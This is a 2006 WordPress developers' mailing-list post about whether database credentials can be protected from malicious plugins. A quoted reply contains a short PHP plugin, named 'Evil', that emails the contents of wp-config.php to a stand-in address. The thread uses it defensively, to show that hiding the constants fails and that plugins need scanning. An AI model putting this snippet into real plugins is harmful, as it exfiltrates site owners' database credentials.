[wp-hackers] Keeping database connection info safe

Joseph Scott joseph at randomnetworks.com
Sat Feb 25 01:01:57 GMT 2006

On Feb 24, 2006, at 4:49 PM, Sam Angove wrote:

> On 2/25/06, Joseph Scott <joseph at randomnetworks.com> wrote:
>> It would be very easy to include some malicious code in a plugin that
>> would attempt to email out those details to "bad people".  So my
>> first thought was to simply undefine the database connection info
>> once a successful database connection has been established.
> <?php
> /*
> Plugin Name: Evil
> */
> wp_mail( 'dr.claw at example.com', '', file_get_contents(ABSPATH .
> 'wp-config.php') );
> ?>
> Dave Grijalva wrote:
>> A better way to do this with php5 is to use private member  
>> variables and a
>> setter function, but I don't think there is a PHP4 equivalent.   
>> Can anybody
>> out there think of a PHP4 compatible way to secure that data?
> You could still read in the source file containing the setter, so
> you're right back where you started.

You are absolutely correct.  I must admit that I hadn't though about  
re-including the wp-config.php file.  Well that bites.  Is there any  
way to really protect against this in either PHP4 or PHP5?  I'm  
inclined at this point to say no and that everyone better be scanning  
their plugins for "evil".  Has anyone put together a list of things  
that should raise the red flag when they see it in a plugin?

Joseph Scott
joseph at randomnetworks.com

More information about the wp-hackers mailing list